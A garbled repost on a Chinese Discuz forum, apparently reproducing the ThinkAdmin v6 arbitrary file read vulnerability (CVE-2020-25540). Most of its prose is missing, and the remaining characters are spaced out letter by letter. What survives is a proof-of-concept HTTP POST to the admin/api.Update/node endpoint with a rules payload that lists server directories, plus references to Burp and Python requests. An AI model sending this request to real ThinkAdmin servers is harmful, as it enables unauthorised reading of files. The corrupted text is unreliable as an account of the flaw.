搜索

[20372] 2020-09-24_Thinkadminv6任意文件读取漏洞(CVE-2020-25540)复现

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2020-09-24_Thinkadminv6任意文件读取漏洞(CVE-2020-25540)复现 T h i n k a d m i n   v 6 C V E - 2 0 2 0 - 2 5 5 4 0 K h a n   2 0 2 0 - 0 9 - 2 4 t h e l o s t w o r l d   t h e l o s t w o r l d T h i n k a d m i n   v 6 C V E - 2 0 2 0 - 2 5 5 4 0 H V V : T h i n k A d m i n T h i n k P H P T h i n k A d m i n   R B A C 使 T h i n k A d m i n   6 G E T : h t t p s : / / g i t h u b . c o m / z o u j i n g l i / T h i n k A d m i n / b l o b / v 6 / a p p / a d m i n / c o n t r o l l e r / a p i / U p d a t e . p h p U p d a t e . p h p : T h i n k a d m i n     2 0 2 0 . 0 8 . 0 3 . 0 1 : P O C t h e l o s t w o r l d   .   - P O S T   / a d m i n . h t m l ? s = a d m i n / a p i . U p d a t e / n o d e   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W i n 6 4 ;   x 6 4 ;   T r i d e n t / 5 . 0 ) C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d
H V V b u r p j s o n p y t h o n - p y t h o n r e q u e s t p o s t C o n t e n t - L e n g t h :   2 2 r u l e s = % 5 B % 2 2 . % 2 F % 2 2 % 5 D
c u r l p o s t : : h t t p s : / / g i t h u b . c o m / z o u j i n g l i / T h i n k A d m i n / i s s u e s / 2 4 4 h t t p s : / / m p . w e i x i n . q q . c o m / s / 1 t m 8 D Z N p G M C y L 6 m c C F U v k A h t t p s : / / w w w . c n b l o g s . c o m / f a n - g x / p / 1 2 3 2 1 3 5 1 . h t m l ( ) !
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理